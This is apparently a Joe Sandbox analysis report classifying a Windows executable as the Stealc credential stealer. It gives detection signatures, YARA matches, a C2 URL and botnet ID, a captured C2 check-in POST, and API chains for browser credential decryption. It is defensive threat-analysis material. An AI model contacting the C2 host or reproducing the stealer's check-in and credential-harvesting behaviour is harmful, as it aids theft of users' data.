Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1518310
MD5:d792f4925d8e515a2aa89f5c9c157f2d
SHA1:e958a4c5049ecee81c30ed3589b2047c9c22c03a
SHA256:30b614408336deed002dcb9dbf0785e48ff68c25b1f5b5d741eac82b868ec32c
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D792F4925D8E515A2AA89F5C9C157F2D)
    • WerFault.exe (PID: 7628 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://193.233.113.184/6d687e53250c2111.php", "Botnet": "LogsDiller1"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1880865468.00000000024BE000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1a51:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1880902280.00000000024EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
    00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000003.1717820690.0000000004110000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        Click to see the 3 entries
        SourceRuleDescriptionAuthorStrings
        0.3.file.exe.4110000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
          0.3.file.exe.4110000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.2.file.exe.40a0e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.file.exe.40a0e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.file.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  Click to see the 1 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T15:32:06.869553+020020442431Malware Command and Control Activity Detected192.168.2.449730193.233.113.18480TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: file.exeAvira: detected
                  Source: http://193.233.113.184/J(Avira URL Cloud: Label: malware
                  Source: http://193.233.113.184/6d687e53250c2111.php/sAvira URL Cloud: Label: malware
                  Source: http://193.233.113.184/6d687e53250c2111.phpcAvira URL Cloud: Label: malware
                  Source: http://193.233.113.184/6d687e53250c2111.phpAvira URL Cloud: Label: malware
                  Source: http://193.233.113.184/Avira URL Cloud: Label: malware
                  Source: http://193.233.113.184/6d687e53250c2111.php5SAvira URL Cloud: Label: malware
                  Source: http://193.233.113.184/wsAvira URL Cloud: Label: malware
                  Source: http://193.233.113.184Avira URL Cloud: Label: malware
                  Source: 00000000.00000003.1717820690.0000000004110000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://193.233.113.184/6d687e53250c2111.php", "Botnet": "LogsDiller1"}
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_040A74A7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_040B9107
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_040A9D27
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_040A9DC7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040ACA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_040ACA87

                  Compliance

                  barindex
                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.1.unpack
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040AE077
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_040AC0D7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_040ADCE7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_040B4107
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040AF917
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040A1937
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_040AE697
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_040B3B17
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040B4B77
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_040AEF87
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_040B47D7

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 193.233.113.184:80
                  Source: Malware configuration extractorURLs: http://193.233.113.184/6d687e53250c2111.php
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 193.233.113.184Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /6d687e53250c2111.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFIHost: 193.233.113.184Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 36 32 37 31 35 45 34 33 42 39 32 39 32 35 33 38 32 31 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 2d 2d 0d 0a Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="hwid"EE62715E43B92925382193------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="build"LogsDiller1------JDBGDHIIDAEBFHJJDBFI--
                  Source: Joe Sandbox ViewASN Name: FREE-MPEIRU FREE-MPEIRU
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,HeapCreate,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 193.233.113.184Connection: Keep-AliveCache-Control: no-cache
                  Source: unknownHTTP traffic detected: POST /6d687e53250c2111.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFIHost: 193.233.113.184Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 36 32 37 31 35 45 34 33 42 39 32 39 32 35 33 38 32 31 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 2d 2d 0d 0a Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="hwid"EE62715E43B92925382193------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="build"LogsDiller1------JDBGDHIIDAEBFHJJDBFI--
                  Source: file.exe, 00000000.00000002.1880902280.000000000251C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.1
                  Source: file.exe, 00000000.00000002.1880734671.00000000024AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1880902280.00000000024EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184
                  Source: file.exe, 00000000.00000002.1880902280.00000000024EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1880902280.000000000251C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/
                  Source: file.exe, 00000000.00000002.1880902280.000000000251C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1880902280.0000000002537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/6d687e53250c2111.php
                  Source: file.exe, 00000000.00000002.1880902280.000000000251C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/6d687e53250c2111.php/s
                  Source: file.exe, 00000000.00000002.1880902280.00000000024EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/6d687e53250c2111.php5S
                  Source: file.exe, 00000000.00000002.1880902280.000000000251C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/6d687e53250c2111.phpc
                  Source: file.exe, 00000000.00000002.1880902280.000000000251C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/J(
                  Source: file.exe, 00000000.00000002.1880902280.000000000251C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/ws
                  Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net

                  System Summary

                  barindex
                  Source: 00000000.00000002.1880865468.00000000024BE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 004045C0 appears 317 times
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1052
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.1880865468.00000000024BE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SBI6B4IZ.htmJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7484
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\ca75aad4-0179-419a-a626-4cd7a2cbcef6Jump to behavior
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1052
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.1.unpack
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024BEA22 push 00000063h; retf 0_2_024BEA29
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024C405D push eax; ret 0_2_024C407B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024C406C push eax; ret 0_2_024C407B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024C108D push 7DD07DC0h; iretd 0_2_024C109E
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040BB29C push ecx; ret 0_2_040BB2AF
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
